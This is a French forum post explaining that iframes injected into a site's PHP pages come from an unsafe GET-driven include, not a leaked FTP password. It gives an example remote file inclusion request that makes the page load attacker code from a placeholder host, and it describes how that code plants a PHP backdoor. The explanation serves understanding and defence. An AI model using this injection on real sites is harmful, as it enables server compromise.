Envoyé par
jreaux62
Tu vois l'Ami, si il existe une donnée qui ne figures pas de façon visible
sur un serveur, c'est bien le mdp du FTP !! alors donner comme reméde a la présence d'iframes dans un PHP , l'explication qu'il faut changer le mot de passe du FTP etc ... c'est n'avoir aucune idée (heureusement) de comment font ceux qui pénétrent sur un site et écrivent quoi que ce soit dans un PHP
J'ais décris hier le mécanisme (un des mécanismes) employé !
Au départ nous croyons qu' il existe une faille de FTP ??
Ors sur un bon serveur, qui aurait eu le code FTP et comment
Alors le coupable ?
Bien sur le trou énorme par un GET,
Mais c 'est quoi ces fichiers PHP et d' ou vient' il ?
Tout bétement que lorsqu'un serveur éxécute un PHP situé SUR le serveur, ce PHP a tout les droits
du reste quand on voit comment PHPBB s'installe, crées des répertoires en change les protections, généres toutes les pages Mysql etc...
Alors c' est simple il me faut mettre au moins un PHP SUR un serveur
Mais voyons il y est déjas ce PHP !!
mapageprincipale.php
puisque tout include dans un PHP ne fait qu'augmenter sa taille et son nombre d'instructions, mais son nom est le même et ses droit aussi bien sur
Alors je fais
mapageprincipale.php?contenu=http://www.xxx.com/pirate.txt
et dans pirate.txt j'écris le code de génération sur le serveur de mon PHP a moi qui m servira de porte d'entrée a tout ce que je veux !
Partager